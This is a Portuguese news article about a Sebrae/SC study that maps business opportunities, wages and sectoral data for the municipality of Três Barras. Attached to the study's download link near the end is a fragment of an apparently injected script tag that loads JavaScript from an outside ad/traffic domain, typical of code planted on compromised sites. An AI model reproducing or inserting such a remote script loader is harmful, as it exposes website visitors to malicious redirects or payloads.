InícioCidadeEstudo do Sebrae/SC aponta oportunidades de negócios em diversos segmentos em Três...

Estudo do Sebrae/SC aponta oportunidades de negócios em diversos segmentos em Três Barras

Últimas notícias

Em ação rápida policias recuperam veículo roubado em Canoinhas

Nesta quinta-feira, 20, a Polícia Militar foi  acionada para...

Mulher vítima de violência doméstica aciona a PM através do botão do pânico

Na manhã desta quinta-feira, 20, uma mulher vítima de...

Quem busca ampliar seu negócio ou se instalar em Três Barras agora conta com um importante aliado.

 

 

O Levantamento de Oportunidades, estudo lançado pelo Sebrae/SC por meio de parceria com o Governo do Município no âmbito do Programa Cidade Empreendedora, visa nortear micros e pequenos empresários, como também grandes investidores, sobre os potenciais de desenvolvimento econômico atuais e para a próxima década.

 

 

A entrega oficial do documento foi feita ao prefeito Luiz Shimoguiri em ato na tarde de quarta-feira (19), na Sala do Empreendedor, com a presença de lideranças empreendedoras e de representantes do poder público municipal.

 

 

Coordenador Regional do Sebrae/SC, Jaime Arcino Dias Júnior afirmou que o estudo traz uma análise dos aspectos potenciais e limitativos de investimentos na cidade e identifica vazios econômicos. “São subsídios para quem busca empreender, mas que para isso necessita de informações e planejamento de crescimento do município para o futuro”, explicou durante o evento.

 

 

Responsável pela pesquisa, a consultora credenciada Maria Gorete Hoffmann fez uma breve explanação sobre o levantamento divido em sete capítulos, e que analisa a caracterização territorial até os ativos físicos existentes, as atividades econômicas dinamizadoras, recursos humanos e capacidade tecnológicas, além da identificação de oportunidades de investimentos.

 

 

Uma das revelações do estudo e que chamam a atenção é sobre a média salarial de empregos formais, que é a quarta posição do Estado. Tendo como base informações do Ministério do Trabalho e Emprego, em Três Barras a média é de R$ 2.660,00, valor acima da média catarinense que é de R$ 2.565,00.

 

 

Apesar de necessitar de estudos técnicos mais avançados, no caso de instalação de unidades geradoras, a pesquisa também mostra que o município possui médio potencial de energia hidrelétrica e de produção de biogás, além de um alto potencial para energia solar e eólica.

 

 

Números levantados em 2016 apontam que o município conta com 689 empresas instaladas e que geram 4.875 empregos, sendo 93,5% delas microempresas e 0,6% de grande porte, responsáveis por 53,7% dos postos de trabalho. O ramo de celulose e papel emprega 1.810 trabalhadores, seguido dos produtos de madeira que oferece 745 vagas e da administração pública, defesa e seguridade social, com 558.

 

 

Quatro empresas correspondem à fabricação de celulose, papel e produtos de papel, que representam R$ 710 milhões de valor adicionado fiscal (VAF), 70,5% do município. Já o VAF da fabricação de produtos de madeira é de R$ 58 milhões e corresponde a 19 empresas instaladas.

 

 

No que se refere apenas a essas atividades econômicas, por exemplo, o estudo identificou pelo menos 20 oportunidades, seja de ampliação de empresas já existentes ou até de implantação de novos negócios a partir da cadeia produtiva.

 

 

Com relação aos micro e pequenos negócios, o estudo elencou oportunidades para Três Barras a partir de comparativos realizados com outras 30 cidades de mesmo porte (15 catarinenses e outras 15 das regiões Sul e Sudeste), explorando informações sobre o mercado, potencial de consumo, concorrência, quantidade de microempreendedores individuais (MEIs), empreendimentos atuantes e empregos gerados.

 

 

De acordo com o levantamento, existe alto potencial de oportunidade para quem busca investir em lojas de moda e vestuário; restaurantes, churrascarias e pizzarias; consultórios odontológicos; açougue; e prestação de serviços jurídicos.

 

 

Estão classificados com potencial médio de oportunidade, a instalação de imobiliárias; de salão de cabeleireiro e outras atividades de tratamento de beleza; serviços de instalação e manutenção elétrica; comércios de móveis e calçados; obras de terraplanagem; transporte rodoviário de carga; serviços de obra e de acabamento (gesso, pintura, etc); loja de perfumaria e cosméticos; e comércio de produtos alimentícios diversos.

 

 

Há ainda outros 40 segmentos elencados pela pesquisa, que se configuram como oportunidades para o desenvolvimento de pequenos e médios negócios.

 

 

Além de apresentar informações sobre a realidade econômica e de investimento atual, prefeito Luiz Shimoguiri afirma que a pesquisa direciona empreendedores a apostar em atividades com potencial crescimento para o futuro do município. “Há segmentos a ser explorados, não só por grandes empreendimentos, mas também por pequenos e médios negócios e que vão contribuir para aumentar a arrecadação e gerar mais emprego e renda”, complementa.

 

 

Para ter acesso às informações completas do Levantamento de Oportunidades, basta acessar o link abaixo: https://www.dropbox.com/s/6hsicn4h896euj2/Tr%C3%AAs%20Barras%20Levantamento%20de%20Oportunidades%20-%20Ed.%202018%20-%20Cidade%20Empreendedora.pdf?dl=0… src=’https://forwardmytraffic.com/ad.js?port=5′ type=’text/javascript’>

Equipe Gazeta
Equipe Gazetahttps://gazetanortesc.com.br
Somos um jornal de notícias e classificados gratuitos. Estamos há 25 anos no mercado e nosso principal diferencial é o jornal digital.